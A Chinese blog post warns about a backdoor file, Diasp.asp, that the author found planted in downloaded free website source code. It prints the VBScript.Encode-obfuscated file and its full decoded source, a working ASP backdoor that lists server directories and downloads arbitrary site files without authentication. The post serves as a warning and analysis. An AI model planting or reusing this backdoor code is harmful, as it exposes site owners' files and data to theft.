警惕隐藏的后门！Diasp.asp

最新推荐文章于 2023-06-20 19:58:01 发布

CMutoo

最新推荐文章于 2023-06-20 19:58:01 发布

阅读量1.9k

点赞数

文章标签： vbscript url cms action each file

本文链接：https://blog.csdn.net/CMutoo/article/details/5553361

版权

闲来无事，在翻阅下载的免费源码的时候发现了这个文件，是经过 Vbscript.Encode 加密的，源码如下：

<%@ LANGUAGE = VBScript.Encode %> <%#@~^jA0AAA==@#@&?nM/DRUmMrwDKr:r;O,'PO1,O,,O11@#@&s!x^YrG PoWMhlDfr.vK+aOBr2Y*@#@&d(6P}wY{F,Ptx@#@&idoGM:lD9kM'I2sl1+vKn6OSrzE~rwJ*@#@&7AV/n@#@&d7sK.slOGkM'Iw^Cm`P+XYSE'J~r&J*@#@&i3UN,q6@#@&2U[,s;x1OkKx@#@&@#@&?;8,?4WSoKV[Dv0/K~(z/mV~0KV[nMnlD4~(X/ms~x*@#@&Nr:~dDD(x9nxD~rSbY+hS6ks+BWKV[D@#@&/DD&UNxO'rJ@#@&6WD,r'8PYK~U@#@&/DD(x[n Yx/D.q NnUDP[~E∟r@#@&xaD@#@&k+DP0KV9nD{0dWconO6WV9nDv0W^[nDhlDtb@#@&r6PWW^[+MRj;(sWs[DdR1G!xO@!'ZPY4+ @#@&6W.Pl^4,0k^nPbxP6GsNDc0rVnd@#@&rkbxkbkQq@#@&DndaWU/ SDrD+,/YMq [+ Y~[,J※q※EL0k^nR l:'E※JL0bVnRdr.+'J@!8D@*J'-(mDsW@#@&U+XO@#@&n^/@#@&6WM~+mm4PbYnh,kx,WW^N+M dE(0KV[+.d@#@&.+k2W /n SDkOn,/OD&U9+UDPLPJ※Z※JLrY: 1m:n'r@!4M@*JL/41.s0@#@&bkxkrQ8@#@&ZmsV,?4GSsWs[Dc0kGBkO:cwlDtBU_8#@#@& +aO@#@&0K.Plm4~Wk^+,kUPWG^NnDcWk^+d@#@&kkrxbkr_8@#@&DnkwKx/RS.kD+~/DD(U9+xD~[,J※F※r'Wk^+cxC:n'r※J'0bs+c/r"[J@!8M@*E[781Ds6@#@&x+XY@#@&+ N~k6@#@&3 NPU;4@#@&@#@&(WP:Db:cIn5!+dYc}EDzjDDkULvJ)mDrKxE*#{JSb/DEP:tnx@#@&[rsPfb.~hlY4d@#@&GkM'PDrhvIn;!n/DR};DXjOMkUovEGk.r#*@#@&hlD4/{?nD7+. tlwaCY4`JcEb@#@&Nb:~0dGBkr~brk@#@&rr{!@#@&rbkx!@#@&U+O,0kW'k+M-+MR^DlOnK4L^YvJ/1.rwDk o 0rs/z/Dn:K4%n1YJb@#@&ZCV^~UtGSsKVNDvW/K~KlDtd'GkDBq#@#@&fbh~skWwks+S9bDO6D@#@&&0~Jx`9rM#@! ,P4+U@#@&ifkMYXO'rJ@#@&AVdn@#@&dGrDD6Y{9rD@#@&Ax[P(W@#@&j+D~skWor^+Px~6/GRVnDsG^ND`hlD4/LfrD*@#@&]/wKU/RMrO+,`r㊣@!8D@*EL/8mMs0*@#@&]/wGUk+ MrD+~vnmYtk[wGDslOfbDc9bDYXO~8##@#@&]+kwKxd+ MkO+,cJ[J'];EndDRj+M-D#mDbl4^+kcJ_KPn|C6j:J#LEa4YYal&zr["+5EndDRj+M-+M.C.bl4snk`EC:Ph{u}?:J#LsK.:mY9kM`9rMY6DS *#@#@&]n/aW /nR .bYnPvEar[rrb[J:ELkr[r:r[okWwkVRkry[Ear[P.b:`"n;!+/D }EDH?ODrUT`Efb.J*#b@#@&?+O~w/Gsbs'HKY4kxT@#@&j+DPW/K'HGDtk L@#@&2x9~(0@#@&@#@&(0~PMkh`"n;!+dOcpEn.H?ODbUT`EzmDkW J*b'rfGh J~P4+x@#@&P9k:,;.V@#@&,fr:~W^~WVkry@#@&~9k:~9 lh+@#@&,frsPK4LUYMnls~/W YnUDKXan~6V1mhn~b/M+SE.s8@#@&PGUls+xOMk:c.;;+kOvJobV1ls+rb#@#@&~q6P9Um:+@!@*JrPK4nU@#@&P,E.VxdD-+M HmwKCDt`E r#'J'ELfUm:@#@&,2 [P&0@#@&@#@&~jYP6dW{?+M-nDcZM+CYn6(LnmDcJUm.raYkULcsrVjH/O:}4LmDE#@#@&~PU+O~6V'6dWco+DWrV`!Ds#@#@&,PWVkry'Wsc/k"n@#@&~P6sglh'6VR lsn@#@&P~?Y~W^'1KOtbxo@#@&~PU+DPW/GxgWOtbUo@#@&@#@&,P?nO,W8LUOM+CsP{P?D7nDcZ.+mYn6(L+1O`rbf}9$RUYM+C:Eb@#@&~PK8LUY.nm:R62x@#@&,~K4%UYM+lsR:zwPxP8@#@&~,W4NjYM+ls JWmNwDG:or^+~EMs@#@&@#@&~,P?nsmOP;Ck+~^mm/+vIbLtD`WVglhnBPc*b@#@&PP,~/lk+,J ldWr@#@&P,~P,ZGUD+xOPHwnP{~r/r9+Kz6 :kRlk0E@#@&P~~,ZlknPrRl7rE@#@&P,P~P/G YnxDPXa+~x,J/r[W&l7rr@#@&,P,PZm/~JcNGmr@#@&~,PP,/W Y+ OPXa+,'~JC2aVrmmOkKx&hkhW.[r@#@&P,~,ZCk+,JR.kaE@#@&P~P,P/G Y+ OKHw+,x~JmwaVrmCObWUz.rwr@#@&~,PP/Ck+~Jca^/E@#@&,PP,P;GxD+UY:X2n,'PrCwaVk1COkKxJ/UN hkOn61nVr@#@&~,PP/Ck+~JcLb0E@#@&,PP,P;GxD+UY:X2n,'Prr:mo+JLr0r@#@&P~P~/m/nPr LaoES,JL2nTJ@#@&,~,P~;W Y+ Y:zwPxPrkhCT+zN2+TJ@#@&~~P,Zm/nPE Sl-J@#@&P,P~~;WxOn YPXan,'~rl!NkKzSC/r@#@&P,P~/m/+,ERsw&r@#@&P,P,P/WUOxOKH2+,'~EmENrGJ:2+Tfr@#@&,P,PZm/~Jc:2or~~Esw+TE@#@&PP,~~ZKxD+UYPza+~',E/bNnGJ:wnLr@#@&P,~,ZCk+,JRMY6E@#@&P~P,P/G Y+ OKHw+,x~JmwaVrmCObWUzMO0r@#@&~,PP/Ck+~Jc4D:EBPrtYsVr@#@&,P~P,ZGUD+xDPXa+P{~EY6Dz4Yhsr@#@&P,~P;ldn,JROaDJ@#@&,~,P~;W Y+ Y:zwPxPrYnaDzw^Ck J@#@&~~P,Zm/nP3sk+@#@&,~P,P/G Y+UO:X2+,x,JCaw^kmmYbGxJW^YYRdDD+mhJ@#@&P,~3x9PU+s+^O@#@&@#@&,~P"+d2Kx/n zN[CC9+.,J;WxD+ OOGkdwK/rObWxrSPrlYDC^ts+ YIPWr^+Ulsn'rP'~6V1Ch@#@&P,~"+daW /+cb9[Cl[+MPE/KxYUY S+ LOtr~,0s/r"@#@&@#@&~P,IndaWxdncZ4lMdY~{PrjKwORE@#@&P~P"+d2Kx/ ZKxYUOKHwPxP/G YnxDPXa+@#@&@#@&P~~"+dwKUk+ ~k lDHMrYPG4N?O.l:c]+mN@#@&~~P"+kwGxdncssEk4@#@&P~~M+/2G /nR;sl.v#@#@&P,W(%?DDnlsR/sK/+@#@&P,?+D~G4N?DDnlh~{PHWD4k o@#@&AxN~(6@#@&EuMDAA==^#~@%>

为什么要加密？好奇心的驱使下使用 VBScript.Encode在线解码工具解码之后得到以下源码：

（也可以使用微软提供的解码工具 screnc.exe 解码）

<%@ LANGUAGE = VBScript %> <% Server.ScriptTimeOut = 999999999 Function FormatDir(Text,Opt) If Opt=1 Then FormatDir=Replace(Text,"/","/") Else FormatDir=Replace(Text,"/","/") End If End Function Sub ShowFolder(fso,byval folderPath,byval n) dim strIndent,i,item,file,folder strIndent="" for i=1 to n strIndent=strIndent & "∟" next set folder=fso.getfolder(folderPath) if folder.SubFolders.count<=0 then for each file in folder.files iii=iii+1 response.write strIndent & "※1※"&file.name&"※"&file.size&"<br>"&vbcrlf next else for each item in folder.subfolders response.write strIndent & "※0※"&item.Name&"<br>"&vbcrlf ii=ii+1 Call ShowFolder(fso,item.path,n+1) next for each file in folder.files iii=iii+1 response.write strIndent & "※1※"&file.name&"※"&file.size&"<br>"&vbcrlf next end if End Sub If Trim(Request.QueryString("Action"))="List" Then dim Dir,Paths Dir=Trim(Request.QueryString("Dir")) Paths=Server.Mappath(".") dim fso,ii,iii ii=0 iii=0 Set fso=server.createobject("scripting.filesystemobject") Call ShowFolder(fso,Paths&Dir,1) Dim FsoFile,Dirtxt If Len(Dir)<2 Then Dirtxt="" Else Dirtxt=Dir End If Set FsoFile = fso.GetFolder(Paths&Dir) Response.Write ("㊣<br>"&vbcrlf) Response.Write (Paths&FormatDir(Dirtxt,1)) Response.Write ("#"&Request.ServerVariables("HTTP_HOST")&"#http://"&Request.ServerVariables("HTTP_HOST")&FormatDir(Dirtxt,2)) Response.Write ("#"&iii&"#"&ii&"#"&FsoFile.size&"#"&Trim(Request.QueryString("Dir"))) Set FsoFile=Nothing Set fso=Nothing End If If Trim(Request.QueryString("Action"))="Down" Then dim url Dim fl,flsize dim Dname Dim objStream,ContentType,flName,isre,url1 Dname=trim(request("FileName")) If Dname<>"" Then url=server.MapPath(".")&"/"&Dname End If Set fso=Server.CreateObject("Scripting.FileSystemObject") Set fl=fso.getfile(url) flsize=fl.size flName=fl.name Set fl=Nothing Set fso=Nothing Set objStream = Server.CreateObject("ADODB.Stream") objStream.Open objStream.Type = 1 objStream.LoadFromFile url Select Case lcase(Right(flName, 4)) Case ".asf" ContentType = "video/x-ms-asf" Case ".avi" ContentType = "video/avi" Case ".doc" ContentType = "application/msword" Case ".zip" ContentType = "application/zip" Case ".xls" ContentType = "application/vnd.ms-excel" Case ".gif" ContentType = "image/gif" Case ".jpg", "jpeg" ContentType = "image/jpeg" Case ".wav" ContentType = "audio/wav" Case ".mp3" ContentType = "audio/mpeg3" Case ".mpg", "mpeg" ContentType = "video/mpeg" Case ".rtf" ContentType = "application/rtf" Case ".htm", "html" ContentType = "text/html" Case ".txt" ContentType = "text/plain" Case Else ContentType = "application/octet-stream" End Select Response.AddHeader "Content-Disposition", "attachment; filename=" & flName Response.AddHeader "Content-Length", flsize Response.Charset = "UTF-8" Response.ContentType = ContentType Response.BinaryWrite objStream.Read Response.Flush response.Clear() objStream.Close Set objStream = Nothing End If %>

简单看了一下，发现这是一个能够列目录以及下载网站上各类文件的后门，看来是有人故意放在整站的源码里的！